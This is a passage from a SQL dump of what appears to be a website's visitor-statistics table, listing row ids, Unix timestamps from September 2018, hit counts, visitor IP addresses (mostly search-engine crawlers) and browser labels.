ther'),(300650,1536483118,1,1,0,0,'54.36.148.116','other'),(300651,1536483142,1,1,0,0,'54.36.148.75','other'),(300652,1536483279,1,1,0,0,'54.36.148.95','other'),(300653,1536483617,1,1,0,0,'66.249.66.26','chrome'),(300654,1536483897,1,1,0,0,'54.36.148.66','other'),(300655,1536483916,1,1,0,0,'66.249.66.73','chrome'),(300656,1536483957,1,1,0,0,'193.106.30.98','firefox'),(300657,1536484184,1,1,0,0,'54.36.148.223','other'),(300658,1536484360,1,1,0,0,'54.36.148.169','other'),(300659,1536484371,1,1,0,0,'178.154.244.29','other'),(300660,1536484464,1,1,0,0,'54.36.149.83','other'),(300661,1536484622,1,1,0,0,'54.36.148.139','other'),(300662,1536484785,1,1,0,0,'5.45.207.19','other'),(300663,1536484836,1,1,0,0,'54.36.148.145','other'),(300664,1536484848,1,1,0,0,'54.36.148.116','other'),(300665,1536484985,1,1,0,0,'54.36.148.198','other'),(300666,1536485063,1,1,0,0,'54.36.148.96','other'),(300667,1536485139,1,1,0,0,'54.36.148.219','other'),(300668,1536485337,1,1,0,0,'54.36.148.70','other'),(300669,1536485418,1,1,0,0,'54.36.149.79','other'),(300670,1536485612,1,1,0,0,'54.36.149.49','other'),(300671,1536485718,1,1,0,0,'54.36.148.205','other'),(300672,1536485827,1,0,1,0,'66.249.66.25',''),(300673,1536485879,1,1,0,0,'54.36.148.29','other'),(300674,1536486267,1,1,0,0,'54.36.149.17','other'),(300675,1536486359,1,1,0,0,'66.249.66.74','chrome'),(300676,1536486456,1,1,0,0,'54.36.149.59','other'),(300677,1536486496,1,1,0,0,'54.36.148.234','other'),(300678,1536486557,1,1,0,0,'54.36.148.48','other'),(300679,1536486683,1,1,0,0,'54.36.148.168','other'),(300680,1536486831,1,1,0,0,'66.249.66.73','chrome'),(300681,1536487231,2,2,0,0,'178.154.244.29','other'),(300682,1536487310,1,1,0,0,'54.36.149.82','other'),(300683,1536487868,1,1,0,0,'54.36.149.101','other'),(300684,1536487934,1,1,0,0,'54.36.148.40','other'),(300685,1536488273,1,1,0,0,'54.36.148.51','other'),(300686,1536488649,1,1,0,0,'54.36.149.87','other'),(300687,1536488660,1,1,0,0,'5.45.207.79','other'),(300688,1536488663,1,1,0,0,'54.36.148.138','other'),(300689,1536489123,1,1,0,0,'207.46.13.208','other'),(300690,1536489141,1,1,0,0,'54.36.149.79','other'),(300691,1536489146,1,1,0,0,'54.36.148.179','other'),(300692,1536489165,1,1,0,0,'216.244.66.241','other'),(300693,1536489819,1,1,0,0,'54.36.148.130','other'),(300694,1536489879,1,1,0,0,'54.36.148.189','other'),(300695,1536490114,1,1,0,0,'54.36.148.163','other'),(300696,1536490377,1,1,0,0,'54.36.149.54','other'),(300697,1536490664,1,1,0,0,'8.29.198.26','other'),(300698,1536490669,2,1,1,0,'66.249.66.74',''),(300699,1536490744,1,1,0,0,'54.36.149.13','other'),(300700,1536491205,1,1,0,0,'195.34.74.111','chrome'),(300701,1536491406,1,1,0,0,'54.36.148.112','other'),(300702,1536491646,1,1,0,0,'54.36.148.227','other'),(300703,1536492141,1,1,0,0,'54.36.148.195','other'),(300704,1536492357,1,1,0,0,'54.36.149.90','other'),(300705,1536492897,1,1,0,0,'54.36.148.180','other'),(300706,1536492948,1,1,0,0,'51.255.65.46','other'),(300707,1536492964,1,1,0,0,'54.36.148.106','other'),(300708,1536493008,1,1,0,0,'54.36.148.35','other'),(300709,1536493489,1,1,0,0,'54.36.149.62','other'),(300710,1536493626,1,1,0,0,'178.154.244.29','other'),(300711,1536493717,1,1,0,0,'54.36.149.1','other'),(300712,1536494147,1,1,0,0,'216.244.66.241','other'),(300713,1536494203,1,1,0,0,'54.36.149.24','other'),(300714,1536494390,1,0,1,0,'66.249.66.26',''),(300715,1536494431,1,1,0,0,'54.36.148.27','other'),(300716,1536494528,1,1,0,0,'54.36.149.18','other'),(300717,1536494643,1,1,0,0,'54.36.149.73','other'),(300718,1536494849,2,2,0,0,'66.249.66.75','chrome'),(300719,1536494870,1,1,0,0,'40.77.167.190','other'),(300720,1536494920,2,2,0,0,'178.154.244.29','other'),(300721,1536495400,1,1,0,0,'66.249.66.73','chrome'),(300722,1536495509,1,1,0,0,'54.36.148.135','other'),(300723,1536496396,1,1,0,0,'40.77.167.125','other'),(300724,1536496438,1,1,0,0,'54.36.148.118','other'),(300725,1536496804,1,1,0,0,'66.249.66.75','chrome'),(300726,1536496834,1,1,0,0,'54.36.149.34','other'),(300727,1536496922,1,1,0,0,'54.36.149.88','other'),(300728,1536497074,1,1,0,0,'54.36.148.122','other'),(300729,1536497267,1,1,0,0,'54.36.148.54','other'),(300730,1536497590,1,1,0,0,'54.36.149.85','other'),(300731,1536497744,1,1,0,0,'54.36.148.188','other'),(300732,1536497946,1,0,1,0,'66.249.66.74',''),(300733,1536498052,1,1,0,0,'54.36.148.148','other'),(300734,1536498340,1,1,0,0,'66.249.66.27','chrome'),(300735,1536498547,1,1,0,0,'40.77.167.190','other'),(300736,1536498702,1,1,0,0,'54.36.148.173','other'),(300737,1536498817,1,1,0,0,'54.36.148.67','other'),(300738,1536499349,1,1,0,0,'54.36.149.23','other'),(300739,1536499732,1,1,0,0,'54.36.149.3','other'),(300740,1536499899,1,1,0,0,'54.36.148.151','other'),(300741,1536499926,1,1,0,0,'54.36.149.10','other'),(300742,1536500223,1,1,0,0,'54.36.148.126','other'),(300743,1536500341,1,1,0,0,'40.77.167.152','other'),(300744,1536500426,1,1,0,0,'66.249.66.75','chrome'),(300745,1536500558,1,1,0,0,'66.249.66.74','chrome'),(300746,1536500676,1,1,0,0,'54.36.149.99','other'),(300747,1536500903,1,1,0,0,'54.36.148.152','other'),(300748,1536501113,1,1,0,0,'54.36.148.237','other'),(300749,1536501348,1,1,0,0,'54.36.148.236','other'),(300750,1536501467,1,1,0,0,'178.154.244.29','other'),(300751,1536501494,1,1,0,0,'8.29.198.26','other'),(300752,1536502090,1,1,0,0,'95.24.31.185','chrome'),(300753,1536502092,1,1,0,0,'94.180.137.85','chrome'),(300754,1536502145,1,1,0,0,'54.36.148.50','other'),(300755,1536502309,1,1,0,0,'54.36.148.63','other'),(300756,1536502843,1,1,0,0,'54.36.148.243','other'),(300757,1536503031,1,1,0,0,'178.154.244.29','other'),(300758,1536503630,1,1,0,0,'66.249.66.73','chrome'),(300759,1536503654,1,1,0,0,'66.249.66.25','chrome'),(300760,1536504061,1,1,0,0,'54.36.148.133','other'),(300761,1536504181,1,1,0,0,'54.36.148.126','other'),(300762,1536504206,1,1,0,0,'54.36.148.243','other'),(300763,1536504258,1,1,0,0,'66.249.66.74','chrome'),(300764,1536504380,1,1,0,0,'54.36.148.124','other'),(300765,1536504760,1,1,0,0,'54.36.148.33','other'),(300766,1536504762,1,1,0,0,'54.36.148.105','other'),(300767,1536504936,1,1,0,0,'40.77.167.152','other'),(300768,1536505006,1,1,0,0,'54.36.149.73','other'),(300769,1536505070,1,1,0,0,'54.36.148.80','other'),(300770,1536505219,1,1,0,0,'54.36.148.97','other'),(300771,1536505771,1,1,0,0,'54.36.149.101','other'),(300772,1536505982,1,1,0,0,'54.36.148.205','other'),(300773,1536506087,1,1,0,0,'54.36.149.61','other'),(300774,1536506147,1,1,0,0,'54.36.148.120','other'),(300775,1536506151,1,1,0,0,'54.36.148.249','other'),(300776,1536506213,2,2,0,0,'66.249.66.74','chrome'),(300777,1536506455,1,1,0,0,'178.154.244.11','other'),(300778,1536507134,1,1,0,0,'54.36.148.80','other'),(300779,1536507712,1,1,0,0,'54.36.149.43','other'),(300780,1536507972,1,1,0,0,'66.249.66.74','chrome'),(300781,1536508343,1,1,0,0,'54.36.149.0','other'),(300782,1536508438,1,1,0,0,'5.45.207.79','other'),(300783,1536508613,1,1,0,0,'54.36.148.232','other'),(300784,1536508878,1,1,0,0,'54.36.149.35','other'),(300785,1536509137,1,1,0,0,'54.36.148.223','other'),(300786,1536509235,2,2,0,0,'66.249.66.74','chrome'),(300787,1536509341,1,1,0,0,'54.36.148.63','other'),(300788,1536509405,1,1,0,0,'54.36.148.188','other'),(300789,1536509602,1,1,0,0,'54.36.148.180','other'),(300790,1536509671,1,1,0,0,'54.36.148.108','other'),(300791,1536509693,1,1,0,0,'54.36.148.168','other'),(300792,1536509792,1,1,0,0,'66.249.66.75','chrome'),(300793,1536509964,1,1,0,0,'54.36.148.236','other'),(300794,1536510090,2,2,0,0,'207.46.13.208','other'),(300795,1536510091,1,1,0,0,'54.36.148.76','other'),(300796,1536510272,1,1,0,0,'54.36.148.109','other'),(300797,1536510516,1,1,0,0,'54.36.149.51','other'),(300798,1536510676,1,1,0,0,'185.29.255.32','chrome'),(300799,1536510886,1,1,0,0,'54.36.148.146','other'),(300800,1536511203,1,1,0,0,'178.154.244.11','other'),(300801,1536511209,1,1,0,0,'178.154.244.29','other'),(300802,1536511221,1,1,0,0,'54.36.148.139','other'),(300803,1536511242,1,1,0,0,'66.249.66.26','chrome'),(300804,1536511396,1,1,0,0,'54.36.148.249','other'),(300805,1536511423,1,1,0,0,'54.36.149.68','other'),(300806,1536511474,1,1,0,0,'54.36.148.247','other'),(300807,1536511508,2,2,0,0,'40.77.167.152','other'),(300808,1536511934,1,1,0,0,'95.108.213.4','other'),(300809,1536512323,1,1,0,0,'8.29.198.27','other'),(300810,1536512359,1,1,0,0,'54.36.148.107','other'),(300811,1536512380,1,1,0,0,'54.36.149.88','other'),(300812,1536512412,1,1,0,0,'54.36.148.198','other'),(300813,1536512431,1,1,0,0,'178.154.244.29','other'),(300814,1536512630,1,1,0,0,'54.36.149.15','other'),(300815,1536512859,1,1,0,0,'54.36.149.52','other'),(300816,1536513635,1,1,0,0,'54.36.149.1','other'),(300817,1536513677,1,1,0,0,'54.36.149.107','other'),(300818,1536513899,1,1,0,0,'37.73.194.72','chrome'),(300819,1536514197,1,1,0,0,'54.36.148.206','other'),(300820,1536514325,1,1,0,0,'54.36.148.84','other'),(300821,1536515017,2,2,0,0,'66.249.66.73','chrome'),(300822,1536515030,1,1,0,0,'54.36.148.169','other'),(300823,1536515133,1,1,0,0,'54.36.148.15','other'),(300824,1536515332,1,1,0,0,'66.249.66.74','chrome'),(300825,1536515476,1,1,0,0,'54.36.148.101','other'),(300826,1536515525,1,1,0,0,'54.36.149.10','other'),(300827,1536515655,1,1,0,0,'54.36.148.133','other'),(300828,1536515778,1,1,0,0,'54.36.149.97','other'),(300829,1536515967,1,1,0,0,'54.36.149.67','other'),(300830,1536516039,1,1,0,0,'54.36.148.129','other'),(300831,1536516166,1,1,0,0,'80.87.36.147','chrome'),(300832,1536516580,1,1,0,0,'54.36.148.182','other'),(300833,1536516839,1,1,0,0,'54.36.148.158','other'),(300834,1536516902,1,1,0,0,'54.36.148.157','other'),(300835,1536517257,1,1,0,0,'54.36.148.107','other'),(300836,1536517348,1,1,0,0,'54.36.149.102','other'),(300837,1536517400,2,2,0,0,'54.36.148.185','other'),(300838,1536518001,1,1,0,0,'54.36.149.88','other'),(300839,1536518235,1,1,0,0,'54.36.148.248','other'),(300840,1536518278,1,1,0,0,'54.36.148.236','other'),(300841,1536518328,1,1,0,0,'54.36.148.108','other'),(300842,1536518409,1,1,0,0,'91.196.178.100','chrome'),(300843,1536518430,1,1,0,0,'5.188.210.51','firefox'),(300844,1536518625,1,1,0,0,'40.77.167.152','other'),(300845,1536518866,1,1,0,0,'66.249.66.75','chrome'),(300846,1536518899,1,1,0,0,'54.36.149.91','other'),(300847,1536518928,1,1,0,0,'54.36.149.73','other'),(300848,1536518947,1,1,0,0,'178.154.244.29','other'),(300849,1536519193,1,1,0,0,'54.36.148.117','other'),(300850,1536519432,1,1,0,0,'54.36.149.101','other'),(300851,1536519839,1,1,0,0,'54.36.148.204','other'),(300852,1536519866,1,1,0,0,'54.36.149.32','other'),(300853,1536520136,1,1,0,0,'54.36.149.98','other'),(300854,1536520175,1,1,0,0,'54.36.149.17','other'),(300855,1536520424,1,1,0,0,'54.36.148.16','other'),(300856,1536520730,1,1,0,0,'54.36.148.254','other'),(300857,1536520806,1,1,0,0,'54.36.148.41','other'),(300858,1536520833,1,1,0,0,'54.36.148.131','other'),(300859,1536521051,1,0,1,0,'66.249.66.26',''),(300860,1536521099,1,1,0,0,'40.77.167.190','other'),(300861,1536521116,1,1,0,0,'54.36.148.17','other'),(300862,1536521378,1,1,0,0,'66.249.66.74','chrome'),(300863,1536521620,1,1,0,0,'54.36.148.113','other'),(300864,1536521797,1,1,0,0,'54.36.148.10','other'),(300865,1536521948,1,1,0,0,'54.36.148.175','other'),(300866,1536521950,1,1,0,0,'95.108.213.4','other'),(300867,1536522082,1,1,0,0,'54.36.148.110','other'),(300868,1536522665,1,1,0,0,'54.36.148.218','other'),(300869,1536522687,1,1,0,0,'54.36.148.64','other'),(300870,1536522732,1,1,0,0,'54.36.148.225','other'),(300871,1536522998,1,1,0,0,'54.36.148.78','other'),(300872,1536523150,1,1,0,0,'8.29.198.26','other'),(300873,1536523197,1,1,0,0,'54.36.148.157','other'),(300874,1536523314,1,1,0,0,'5.45.207.79','other'),(300875,1536523442,1,1,0,0,'40.77.167.190','other'),(300876,1536523713,1,1,0,0,'207.46.13.208','other'),(300877,1536523787,1,1,0,0,'54.36.148.155','other'),(300878,1536523821,2,2,0,0,'54.36.148.253','other'),(300879,1536524769,4,4,0,0,'95.216.41.162','other'),(300880,1536525263,1,1,0,0,'54.36.148.30','other'),(300881,1536525854,1,1,0,0,'54.36.149.73','other'),(300882,1536525888,2,2,0,0,'91.196.178.133','chrome'),(300883,1536526933,1,1,0,0,'66.249.66.73','chrome'),(300884,1536527028,1,1,0,0,'95.221.159.242','msie'),(300885,1536527052,1,1,0,0,'54.36.148.225','other'),(300886,1536527578,1,1,0,0,'54.36.148.18','other'),(300887,1536527669,1,1,0,0,'54.36.149.30','other'),(300888,1536527880,1,1,0,0,'54.36.148.56','other'),(300889,1536528055,1,1,0,0,'54.36.148.211','other'),(300890,1536528251,1,1,0,0,'193.106.30.98','firefox'),(300891,1536528330,1,1,0,0,'54.36.149.34','other'),(300892,1536528386,1,1,0,0,'54.36.149.38','other'),(300893,1536528487,1,1,0,0,'54.36.148.42','other'),(300894,1536528495,1,1,0,0,'54.36.149.76','other'),(300895,1536528526,1,1,0,0,'54.36.148.46','other'),(300896,1536529218,1,1,0,0,'40.77.167.181','other'),(300897,1536529603,1,1,0,0,'54.36.148.171','other'),(300898,1536529959,1,1,0,0,'54.36.148.111','other'),(300899,1536530138,1,1,0,0,'54.36.148.16','other'),(300900,1536530210,1,1,0,0,'54.36.148.241','other'),(300901,1536530603,1,1,0,0,'192.99.110.157','firefox'),(300902,1536530890,1,1,0,0,'54.36.148.227','other'),(300903,1536530935,1,1,0,0,'54.36.149.47','other'),(300904,1536531051,1,1,0,0,'54.36.148.101','other'),(300905,1536531101,1,1,0,0,'54.36.148.125','other'),(300906,1536531148,1,1,0,0,'66.249.66.75','chrome'),(300907,1536531320,1,1,0,0,'54.36.148.161','other'),(300908,1536531497,2,1,1,0,'66.249.66.73',''),(300909,1536531507,1,1,0,0,'54.36.149.61','other'),(300910,1536532451,1,1,0,0,'54.36.148.112','other'),(300911,1536532535,1,1,0,0,'54.36.149.24','other'),(300912,1536532636,1,1,0,0,'5.45.207.79','other'),(300913,1536532823,1,1,0,0,'66.249.66.73','chrome'),(300914,1536532951,1,1,0,0,'54.36.148.214','other'),(300915,1536533038,1,1,0,0,'54.36.148.242','other'),(300916,1536533441,1,1,0,0,'54.36.148.21','other'),(300917,1536533523,1,1,0,0,'54.36.148.249','other'),(300918,1536533883,1,1,0,0,'54.36.149.106','other'),(300919,1536533974,1,1,0,0,'8.29.198.25','other'),(300920,1536534758,1,1,0,0,'54.36.148.198','other'),(300921,1536535438,1,1,0,0,'54.36.148.59','other'),(300922,1536535908,1,1,0,0,'54.36.149.86','other'),(300923,1536536006,1,1,0,0,'54.36.148.69','other'),(300924,1536536522,1,1,0,0,'54.36.148.188','other'),(300925,1536537074,1,1,0,0,'54.36.149.74','other'),(300926,1536537587,1,1,0,0,'95.163.255.93','other'),(300927,1536537600,1,1,0,0,'54.36.148.154','other'),(300928,1536537685,1,1,0,0,'54.36.148.71','other'),(300929,1536538002,1,1,0,0,'54.36.148.124','other'),(300930,1536538033,1,1,0,0,'54.36.148.228','other'),(300931,1536538155,1,1,0,0,'66.249.66.74','chrome'),(300932,1536538246,1,1,0,0,'54.36.149.36','other'),(300933,1536538523,1,1,0,0,'54.36.148.139','other'),(300934,1536538758,1,1,0,0,'54.36.148.204','other'),(300935,1536538958,1,1,0,0,'54.36.148.37','other'),(300936,1536539216,1,1,0,0,'54.36.148.192','other'),(300937,1536539292,1,1,0,0,'54.36.149.40','other'),(300938,1536539678,1,1,0,0,'54.36.148.58','other'),(300939,1536539889,1,1,0,0,'13.66.139.0','other'),(300940,1536540033,1,1,0,0,'178.154.244.29','other'),(300941,1536540291,1,1,0,0,'54.36.148.168','other'),(300942,1536540503,1,1,0,0,'54.36.148.234','other'),(300943,1536540648,1,1,0,0,'54.36.148.35','other'),(300944,1536540719,1,1,0,0,'66.249.66.75','chrome'),(300945,1536540756,1,1,0,0,'54.36.148.189','other'),(300946,1536541064,1,1,0,0,'54.36.148.154','other'),(300947,1536541113,1,1,0,0,'13.66.139.0','other'),(300948,1536541117,1,1,0,0,'54.36.148.100','other'),(300949,1536541158,1,1,0,0,'54.36.149.76','other'),(300950,1536541289,1,1,0,0,'54.36.149.36','other'),(300951,1536541548,1,1,0,0,'54.36.148.142','other'),(300952,1536541858,1,1,0,0,'216.244.66.241','other'),(300953,1536541868,1,1,0,0,'54.36.148.63','other'),(300954,1536541878,1,1,0,0,'66.249.66.73','chrome'),(300955,1536541896,1,1,0,0,'54.36.148.26','other'),(300956,1536542057,1,1,0,0,'54.36.149.37','other'),(300957,1536542185,1,1,0,0,'54.36.148.188','other'),(300958,1536542243,1,1,0,0,'66.249.66.74','chrome'),(300959,1536542382,1,1,0,0,'54.36.148.202','other'),(300960,1536542408,1,1,0,0,'54.36.148.213','other'),(300961,1536542501,1,1,0,0,'54.36.148.21','other'),(300962,1536542555,1,1,0,0,'54.36.149.6','other'),(300963,1536542721,1,1,0,0,'40.77.167.152','other'),(300964,1536542843,1,1,0,0,'54.36.148.247','other'),(300965,1536543416,1,1,0,0,'66.249.66.75','chrome'),(300966,1536543670,1,1,0,0,'54.36.148.120','other'),(300967,1536544120,1,1,0,0,'37.9.113.148','other'),(300968,1536544751,1,1,0,0,'54.36.148.49','other'),(300969,1536544753,1,1,0,0,'54.36.149.54','other'),(300970,1536544811,1,1,0,0,'8.29.198.26','other'),(300971,1536545004,1,1,0,0,'54.36.148.26','other'),(300972,1536545064,1,1,0,0,'54.36.148.147','other'),(300973,1536545086,1,1,0,0,'54.36.148.133','other'),(300974,1536545489,1,1,0,0,'5.45.207.79','other'),(300975,1536545642,1,1,0,0,'66.249.66.75','chrome'),(300976,1536545988,1,1,0,0,'54.36.149.56','other'),(300977,1536545994,1,1,0,0,'54.36.148.156','other'),(300978,1536546153,1,1,0,0,'54.36.149.37','other'),(300979,1536546205,1,1,0,0,'54.36.148.207','other'),(300980,1536546255,1,1,0,0,'54.36.148.243','other'),(300981,1536546859,1,1,0,0,'54.36.149.13','other'),(300982,1536547462,1,1,0,0,'54.36.148.55','other'),(300983,1536547473,1,1,0,0,'193.106.30.98','firefox'),(300984,1536547496,1,1,0,0,'54.36.148.32','other'),(300985,1536547524,1,1,0,0,'54.36.148.153','other'),(300986,1536547929,1,1,0,0,'54.36.148.224','other'),(300987,1536547991,1,1,0,0,'40.77.167.152','other'),(300988,1536548040,1,1,0,0,'54.36.148.37','other'),(300989,1536548042,1,1,0,0,'54.36.148.57','other'),(300990,1536548379,1,1,0,0,'35.162.70.167','chrome'),(300991,1536548444,1,1,0,0,'178.154.244.11','other'),(300992,1536549074,1,1,0,0,'54.36.148.142','other'),(300993,1536549144,1,1,0,0,'66.249.66.75','chrome'),(300994,1536549170,1,1,0,0,'54.36.148.199','other'),(300995,1536549241,1,1,0,0,'54.36.148.201','other'),(300996,1536549344,1,1,0,0,'54.36.148.212','other'),(300997,1536549465,1,1,0,0,'54.36.148.91','other'),(300998,1536549687,1,1,0,0,'54.36.149.20','other'),(300999,1536550169,1,1,0,0,'54.36.148.25','other'),(301000,1536550342,1,1,0,0,'54.36.148.253','other'),(301001,1536550456,1,1,0,0,'54.36.148.248','other'),(301002,1536550547,1,1,0,0,'91.196.178.133','chrome'),(301003,1536550958,1,1,0,0,'54.36.149.76','other'),(301004,1536551068,2,2,0,0,'5.45.207.19','other'),(301005,1536551127,2,2,0,0,'5.45.207.79','other'),(301006,1536551332,1,1,0,0,'178.154.244.11','other'),(301007,1536551336,2,2,0,0,'178.154.244.29','other'),(301008,1536551509,1,1,0,0,'54.36.148.197','other'),(301009,1536551619,1,1,0,0,'54.36.149.95','other'),(301010,1536551780,1,1,0,0,'54.36.148.142','other'),(301011,1536551820,1,1,0,0,'54.36.149.57','other'),(301012,1536552030,1,1,0,0,'54.36.148.114','other'),(301013,1536552119,6,6,0,0,'62.210.101.96','other'),(301014,1536552613,1,1,0,0,'54.36.149.68','other'),(301015,1536552694,1,1,0,0,'54.36.148.51','other'),(301016,1536552713,1,1,0,0,'54.36.148.93','other'),(301017,1536552795,1,1,0,0,'54.36.148.210','other'),(301018,1536553300,1,1,0,0,'54.36.148.119','other'),(301019,1536553408,1,1,0,0,'54.36.149.72','other'),(301020,1536553577,1,1,0,0,'54.36.148.232','other'),(301021,1536553590,1,1,0,0,'54.36.148.60','other'),(301022,1536553959,1,1,0,0,'40.77.167.152','other'),(301023,1536554910,1,1,0,0,'216.244.66.241','other'),(301024,1536555042,1,1,0,0,'54.36.148.108','other'),(301025,1536555075,1,1,0,0,'54.36.148.140','other'),(301026,1536555365,1,1,0,0,'54.36.149.36','other'),(301027,1536555381,1,1,0,0,'54.36.148.120','other'),(301028,1536555532,1,1,0,0,'54.36.148.238','other'),(301029,1536555546,1,1,0,0,'54.36.149.50','other'),(301030,1536555642,1,1,0,0,'8.29.198.27','other'),(301031,1536555740,1,1,0,0,'40.77.167.167','other'),(301032,1536556104,1,1,0,0,'216.244.66.241','other'),(301033,1536556224,1,1,0,0,'5.9.154.69','other'),(301034,1536556233,1,1,0,0,'54.36.148.160','other'),(301035,1536556316,1,1,0,0,'178.154.244.29','other'),(301036,1536556806,1,1,0,0,'54.36.148.190','other'),(301037,1536556825,1,1,0,0,'54.36.148.47','other'),(301038,1536557045,1,1,0,0,'54.36.148.126','other'),(301039,1536557210,1,1,0,0,'66.249.66.75','chrome'),(301040,1536557658,1,1,0,0,'54.36.149.36','other'),(301041,1536557712,1,1,0,0,'54.36.148.113','other'),(301042,1536557872,1,1,0,0,'207.46.13.4','other'),(301043,1536558175,1,1,0,0,'54.36.148.209','other'),(301044,1536558181,1,1,0,0,'54.36.148.135','other'),(301045,1536558226,1,1,0,0,'178.154.244.29','other'),(301046,1536558246,1,1,0,0,'54.36.148.217','other'),(301047,1536558273,1,1,0,0,'178.154.244.11','other'),(301048,1536558725,1,1,0,0,'54.36.148.248','other'),(301049,1536558761,1,1,0,0,'54.36.149.63','other'),(301050,1536559027,1,1,0,0,'54.36.148.172','other'),(301051,1536559146,1,1,0,0,'54.36.148.195','other'),(301052,1536559448,1,1,0,0,'54.36.148.253','other'),(301053,1536559450,1,1,0,0,'54.36.148.178','other'),(301054,1536559685,1,1,0,0,'54.36.149.97','other'),(301055,1536559839,1,1,0,0,'95.163.255.108','other'),(301056,1536559849,1,1,0,0,'95.163.255.117','other'),(301057,1536559863,1,1,0,0,'95.163.255.102','other'),(301058,1536559877,1,1,0,0,'95.163.255.109','other'),(301059,1536559885,1,1,0,0,'5.45.207.79','other'),(301060,1536560091,1,1,0,0,'54.36.148.81','other'),(301061,1536560190,1,1,0,0,'54.36.148.101','other'),(301062,1536560611,1,1,0,0,'54.36.148.133','other'),(301063,1536560834,1,1,0,0,'54.36.148.220','other'),(301064,1536560902,1,1,0,0,'178.154.244.29','other'),(301065,1536560971,1,1,0,0,'54.36.148.61','other'),(301066,1536561064,1,1,0,0,'92.113.6.104','chrome'),(301067,1536561087,1,1,0,0,'95.163.255.97','other'),(301068,1536561183,1,1,0,0,'54.36.149.42','other'),(301069,1536561287,2,2,0,0,'95.213.141.126','opera'),(301070,1536561347,1,1,0,0,'54.36.148.122','other'),(301071,1536561393,1,1,0,0,'80.252.153.33','chrome'),(301072,1536561415,1,1,0,0,'213.180.203.53','other'),(301073,1536561448,1,1,0,0,'54.36.148.188','other'),(301074,1536561468,1,1,0,0,'54.36.149.68','other'),(301075,1536561855,2,2,0,0,'54.36.148.48','other'),(301076,1536561955,1,1,0,0,'54.36.148.215','other'),(301077,1536562084,2,2,0,0,'216.244.66.241','other'),(301078,1536562173,1,1,0,0,'54.36.148.154','other'),(301079,1536562228,1,1,0,0,'5.45.207.79','other'),(301080,1536562586,1,1,0,0,'54.36.149.69','other'),(301081,1536562818,1,1,0,0,'54.36.149.43','other'),(301082,1536563040,1,1,0,0,'54.36.148.37','other'),(301083,1536563065,1,1,0,0,'178.154.244.11','other'),(301084,1536563163,1,1,0,0,'54.36.148.62','other'),(301085,1536563195,1,1,0,0,'54.36.149.104','other'),(301086,1536563426,1,1,0,0,'141.8.142.103','other'),(301087,1536563429,1,1,0,0,'5.45.207.79','other'),(301088,1536563488,1,1,0,0,'213.180.203.9','other'),(301089,1536563492,1,1,0,0,'40.77.167.167','other'),(301090,1536563503,1,1,0,0,'66.249.66.75','chrome'),(301091,1536563583,1,1,0,0,'141.8.183.23','other'),(301092,1536563810,1,1,0,0,'54.36.149.103','other'),(301093,1536564035,1,1,0,0,'54.36.148.111','other'),(301094,1536564113,1,1,0,0,'54.36.149.80','other'),(301095,1536564121,1,1,0,0,'54.36.148.174','other'),(301096,1536564163,1,1,0,0,'54.36.149.42','other'),(301097,1536564257,1,1,0,0,'54.36.148.161','other'),(301098,1536564468,1,1,0,0,'54.36.148.79','other'),(301099,1536564738,1,1,0,0,'95.133.151.60','firefox'),(301100,1536565129,1,1,0,0,'54.36.148.220','other'),(301101,1536565227,1,1,0,0,'54.36.149.18','other'),(301102,1536565255,1,1,0,0,'54.36.149.6','other'),(301103,1536565264,1,1,0,0,'54.36.149.54','other'),(301104,1536565881,1,1,0,0,'82.145.223.131','chrome'),(301105,1536565931,1,1,0,0,'199.58.86.206','other'),(301106,1536566240,1,1,0,0,'54.36.149.73','other'),(301107,1536566324,1,1,0,0,'66.249.66.75','chrome'),(301108,1536566477,1,1,0,0,'8.29.198.27','other'),(301109,1536566790,1,1,0,0,'54.36.149.5','other'),(301110,1536566879,1,1,0,0,'54.36.148.191','other'),(301111,1536567093,2,2,0,0,'54.208.102.37','other'),(301112,1536567095,1,1,0,0,'107.21.1.8','other'),(301113,1536567133,1,1,0,0,'54.36.148.179','other'),(301114,1536567589,1,1,0,0,'91.196.178.93','chrome'),(301115,1536567657,1,1,0,0,'54.36.148.158','other'),(301116,1536567660,1,1,0,0,'31.134.113.205','chrome'),(301117,1536567795,1,1,0,0,'54.36.148.250','other'),(301118,1536567930,1,1,0,0,'54.36.148.45','other'),(301119,1536568072,1,1,0,0,'134.249.146.125','chrome'),(301120,1536568086,1,1,0,0,'54.36.149.39','other'),(301121,1536568109,1,1,0,0,'54.36.148.70','other'),(301122,1536568123,1,1,0,0,'31.43.31.55','chrome'),(301123,1536568135,1,1,0,0,'141.8.132.16','other'),(301124,1536568136,1,1,0,0,'178.154.244.21','other'),(301125,1536568253,1,1,0,0,'66.249.66.25','chrome'),(301126,1536568614,1,1,0,0,'40.77.167.152','other'),(301127,1536568981,1,1,0,0,'54.36.149.4','other'),(301128,1536569055,1,1,0,0,'93.170.189.117','chrome'),(301129,1536569307,1,1,0,0,'54.36.148.187','other'),(301130,1536569496,1,1,0,0,'54.36.148.159','other'),(301131,1536569614,1,1,0,0,'54.36.149.72','other'),(301132,1536569718,2,2,0,0,'91.196.178.89','chrome'),(301133,1536570128,1,1,0,0,'78.111.185.83','chrome'),(301134,1536570153,1,1,0,0,'66.249.66.75','chrome'),(301135,1536570228,1,1,0,0,'54.36.148.164','other'),(301136,1536570414,1,1,0,0,'54.36.148.142','other'),(301137,1536570672,1,1,0,0,'91.196.178.89','chrome'),(301138,1536570747,1,1,0,0,'54.36.148.206','other'),(301139,1536570867,2,2,0,0,'141.8.183.23','other'),(301140,1536570870,1,1,0,0,'5.45.207.79','other'),(301141,1536570998,1,1,0,0,'141.8.142.108','other'),(301142,1536571203,1,1,0,0,'54.36.148.43','other'),(301143,1536571324,1,1,0,0,'54.36.148.252','other'),(301144,1536571347,2,2,0,0,'66.249.66.73','chrome'),(301145,1536571691,1,1,0,0,'54.36.148.255','other'),(301146,1536571751,1,1,0,0,'54.36.148.86','other'),(301147,1536572113,1,1,0,0,'54.36.148.17','other'),(301148,1536572220,1,1,0,0,'54.36.148.127','other'),(301149,1536572475,2,2,0,0,'91.196.177.46','chrome'),(301150,1536572846,1,1,0,0,'54.36.148.190','other'),(301151,1536572858,1,1,0,0,'54.36.148.69','other'),(301152,1536573013,2,2,0,0,'54.36.149.20','other'),(301153,1536573032,1,1,0,0,'66.249.66.73','chrome'),(301154,1536573160,1,1,0,0,'54.36.149.90','other'),(301155,1536573210,1,1,0,0,'66.102.9.134','chrome'),(301156,1536573425,2,2,0,0,'91.196.177.134','chrome'),(301157,1536573732,1,1,0,0,'54.36.148.175','other'),(301158,1536574015,1,1,0,0,'54.36.148.195','other'),(301159,1536574198,1,1,0,0,'54.36.149.49','other'),(301160,1536574249,1,1,0,0,'54.36.148.80','other'),(301161,1536574555,1,1,0,0,'54.36.149.43','other'),(301162,1536574806,1,1,0